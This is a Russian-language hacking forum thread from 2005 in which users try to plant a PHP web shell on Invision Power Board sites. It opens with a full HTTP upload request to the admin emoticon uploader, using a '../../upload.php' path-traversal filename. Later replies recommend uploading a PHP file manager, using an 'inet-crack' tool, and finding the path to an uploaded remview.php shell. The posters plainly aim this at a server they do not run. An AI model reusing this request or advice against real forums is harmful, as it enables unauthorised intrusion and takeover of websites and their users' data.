PDA

Просмотр полной версии : Вопрос по форуму IPB


dyx
25.05.2005, 08:29
Кто нить помогите, что за хрень
вот пишу значит код


POST http://site.com/admin.php?adsess=2c9b9a61a1a17a542bb0319a74d80531 HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://site.com/admin.php?adsess=2c9b9a61a1a17a542bb0319a74d80531&act=op&code=emo
Accept-Language: ru
Content-Type: multipart/form-data; boundary=---------------------------7d43942c405bc
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 677
Pragma: no-cache
Cookie: member_id=5716; pass_hash=95cc6b4ac5abdeadc74b73a8ba7200d9;

-----------------------------7d43942c405bc
Content-Disposition: form-data; name="adsess"

2c9b9a61a1a17a542bb0319a74d80531
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="code"

emo_upload
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="act"

op
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000000
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="FILE_UPLOAD"; filename="../../upload.php"
Content-Type: application/octet-stream

"some code here"


-----------------------------7d43942c405bc--



только в выбранную папку ничего не грузится а грузится все в папку emoticons хотя должно в корневую папку форума, я много вариантов пробовал, скажите где ошибка, на локалхосте кстати все работает нормально в любую папку кидает файл, а вот на реальном сервере только в emoticons...

KEZ
25.05.2005, 13:34
У меня на локалхосте только в emoticons а на серверах не пробовал.
Возможны ограничения по правам. Да и на Windows'е это тоже криво работает.

dampil
25.05.2005, 13:37
Лично я и не смог организовать загрузку файлов через етот метод :(

Grrl
25.05.2005, 16:18
Если грузится вообще(!) хоть в emoticons это уже хорошо,значит она открыта на запись! Залевай туда какой-ниить php файл менеджер и дело в шляпе.Нахрена тебе в корневом светиться вообще?
И в emoticons можно заливать прямо из админки если папка открыта на запись.

dyx
25.05.2005, 19:32
в том то и дело что на том серваке который мне нужен там в паку emoticons запрет на заливку

Grrl
25.05.2005, 23:28
Попрбуй залить через inet-crack в папку uploads она обычно открыта для записи.

dyx
26.05.2005, 14:38
Я уже все перепробовал и inetcrack и чем только непробовал, короче не знаю что делать...

McDI
12.06.2005, 06:02
Вы вот тут советуете прикрепить remview.php к посту. Если я заливаю картинку то путь к ней что то вроде:/upload/p21-32-343432, а как вы находите путь к шеллу? Пробовал заливать картинки несколько раз подряд, путь всегда разный, так что угадать не получается!

KEZ
12.06.2005, 11:24
тоеретичке в Http запросе надо поставить в имени файла
../../имя
тогда путь локально отсечется и зальется на сервер с учетом ../..
однако у мен ятак не получалось

McDI
12.06.2005, 13:25
А если в БД поковырять, наверняка так где нить, что нить да записано?

Ps: :rolleyes: